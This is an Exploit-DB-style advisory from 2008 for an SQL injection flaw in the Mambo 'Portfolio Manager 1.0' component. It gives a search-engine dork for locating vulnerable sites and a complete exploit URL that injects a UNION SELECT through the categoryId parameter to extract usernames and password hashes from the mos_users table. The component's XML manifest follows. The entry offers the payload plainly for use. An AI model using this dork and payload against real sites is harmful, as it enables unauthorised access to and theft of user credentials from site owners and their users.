Mambo Component Portfolio Manager 1.0 - 'categoryId' SQL Injection

EDB-ID:

5139

CVE:

N/A


Author:

it's my

Type:

webapps


Platform:

PHP

Date:

2008-02-18


#########################################################
##
##  Mambo component Portfolio Manager 1.0 (com_portfolio)
##
##
##  Author: it's my
##
##  Home page: http://www.antichat.ru
##
#########################################################
##
## Dork: inurl:"index.php?option=com_portfolio"
##
#########################################################
   
   Exploit:

http://site.com/index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*

#########################################################
## it's my sick world =/   ####    www.antichat.ru
#########################################################



    <name>portfolio</name>
    <creationDate>2005.09.15</creationDate>
    <author>Garry Malhi</author>
    <copyright>This component  is released under the GNU/GPL License</copyright>
    <authorEmail></authorEmail>
    <authorUrl></authorUrl>

    <version>1.0</version>
    <description>Portfolio Manager Component</description>

# milw0rm.com [2008-02-18]